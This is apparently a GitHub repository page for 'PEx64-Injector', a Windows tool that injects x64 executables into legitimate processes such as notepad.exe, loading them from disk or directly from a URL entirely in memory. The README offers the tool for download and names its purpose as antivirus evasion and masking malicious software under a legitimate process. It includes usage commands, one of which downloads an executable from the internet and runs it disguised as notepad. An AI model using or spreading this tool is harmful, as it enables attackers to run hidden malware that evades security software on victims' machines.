Skip to content

A tool for injecting 64-bit executables into legitimate processes. Users can specify a local file or download one from a URL, with all operations performed in memory to evade antivirus detection.

Notifications You must be signed in to change notification settings

0xyg3n/PEx64-Injector

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 

Repository files navigation

PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]

Inject any x64 exe to any x64 process (Net FrameWork 3.5) Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.

No Administrator privileges required.

GIF Demo

PoC

How can be used?

shot

Download here.

Usage: Migrator.exe "localfilePath(Lpath)" or "direct URL" "Legitfile(fpath)"

Usage Example: 1. Migrator.exe "C:\Users\User\Desktop\Putty64.exe" "C:\Windows\System32\notepad.exe"

Usage Example: 2. Migrator.exe "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" "C:\Windows\System32\notepad.exe"

Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.

Such tool can be utilized for AV evasion, masking malicious software under legitimate process.

Code

Special thanks to GigaJew.

About

A tool for injecting 64-bit executables into legitimate processes. Users can specify a local file or download one from a URL, with all operations performed in memory to evade antivirus detection.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages